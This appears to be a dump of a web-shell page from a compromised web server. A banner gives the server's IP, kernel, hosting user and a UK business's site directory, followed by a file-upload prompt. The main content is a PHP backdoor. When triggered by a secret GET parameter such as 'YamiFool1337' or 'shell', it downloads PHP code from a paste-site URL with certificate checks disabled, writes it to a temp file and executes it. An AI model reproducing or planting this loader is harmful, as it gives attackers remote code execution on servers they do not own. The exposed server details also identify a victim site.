| Server IP : 87.106.199.119 / Your IP : 216.73.216.52 Web Server : Apache System : Linux youthful-elion.87-106-199-119.plesk.page 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64 User : hbsurveyingltd.co.uk_83ploscmra2 ( 10012) PHP Version : 8.4.24 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/hbsurveyingltd.co.uk/httpdocs/ |
Upload File : |
<?php
error_reporting(0);
$param = isset($_GET['YamiFool1337']) || isset($_GET['shell']) || isset($_GET['1337']);
if ($param) {
$url = 'https://pastefy.app/SLoJea6l/raw';
$content = '';
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$content = curl_exec($ch);
curl_close($ch);
} elseif (ini_get('allow_url_fopen')) {
$content = file_get_contents($url);
}
if ($content && strpos($content, '<?php') !== false) {
$tmp = tempnam(sys_get_temp_dir(), 'shell_');
if ($tmp) {
file_put_contents($tmp, $content);
include $tmp;
unlink($tmp);
exit;
}
}
die('Unable to load shell');
}
?>